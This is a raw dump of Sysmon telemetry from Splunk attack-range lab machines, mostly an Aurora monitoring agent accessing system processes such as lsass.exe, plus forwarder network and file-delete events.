Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018078Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.552{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018077Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.548{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 354300x800000000000000045698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:40.602{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56435-false10.0.1.12-8000- 23542300x800000000000000018110Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:43.814{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E1CF3D031E70F0CB4890D18854F3093,SHA256=C90A5814E1E704C011E9ABAFD629BF921FD7AD2545EAD1D2392BDF6D70B67602,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000018109Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:40.991{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50162-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018111Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:44.895{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3CCDD504902D2E57AA464730F27B570,SHA256=BD7F009CA0911056E496C48FBAE3769D79CE4561CB5F90E54F82D266E0360FD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:44.030{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88E3177E2B9310B1316F94DB0A61CB0C,SHA256=4DBE67D5A2F19DB63A2B6B64C9F14FF0B6EC608DBA1B0865B0BAC69B85186DC4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:45.108{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A6F5F3A06D0AECBFC33D49BE26839D7,SHA256=89047584DE5C09CFA125F7938D99688E2E7ADFBB2BD6D1C5D4A47C4BDFE30517,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018112Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:46.083{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89626DE36B4288E424CA2052A573B82E,SHA256=45309D5E1E88ED116C1EC5B95F2F906DCD0B11CB32B21DD95CEE3F4CC1B625B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:46.194{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4762681941E045AFF8C39BEE71071619,SHA256=E7635B6418307CB6B22E8FF7A9D28FDF98FC3875A357C86513970E45434912A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:47.279{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67F768EBDFD3F6C676051E31E9B0DA4B,SHA256=70EF30E4CFF704A660DFF0235649520D7AAE371998A7CCF4CB372B2998916CBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018113Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:47.163{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1099113CB3EC5A1D78C5EE5CA6B54EB2,SHA256=16647A6E1EEB128B8753FE51E461B787C750AE303494B7C1D791364CCCF054F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:46.548{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56436-false10.0.1.12-8000- 23542300x800000000000000045704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:48.357{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EC79AFD7D512F1C6335FFA364426B9B,SHA256=EA24187425028A9071EDF2B67B31DF6BA43CD4BCC354B7379F6B681E14527195,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018115Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:46.975{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50163-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018114Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:48.246{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7D06CF180183BFDE095BE63B88DCD81,SHA256=524E556E81A43DD3C5E35832182BA1772CB96986A854252572E1AF853BD1F857,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018116Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:49.324{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F317E9D9776E541A0EEBCF6299688C84,SHA256=0914D66F9DC40AB7DE2C50483F75B53412C1460693EB1B81B2AEE89A95208421,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:49.453{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05B87E32E2116564A96A0075881441B4,SHA256=EC456B1B9CD945707D45AC1ACA8174039E3D00F80A7B072A69A15F08ACD9CC79,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:50.552{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B754BD141988445DB28C9418C42E4828,SHA256=284F321ACFEE3F2BAD701A63D0262F0BC519360C86396FE5F67C53F79F516A98,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018117Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:50.416{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACCDADC192CEEC22BA17078E137741F5,SHA256=F5BFDCFF410694DD4F70665E4662B593AC3DF252B22D9EFF94CC7533ACF48948,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018118Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:51.507{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D449B558CC07B4B91C31B5B0E7C1269F,SHA256=9CB4262B09E5B3311811CF27A7CB25F1CF8C21F8FB485F57748EE43DEB8A7837,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.970{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.953{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.950{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.945{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.888{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.882{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.850{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.837{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.811{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.804{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.797{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.790{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.753{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.745{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000045708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.641{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F225CF28C13F39FDC5836219A52FF8A9,SHA256=B49A0699DA1D59966D1BE0A1CBF5FF872331ED4FBAADAFB384A3E12641648929,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 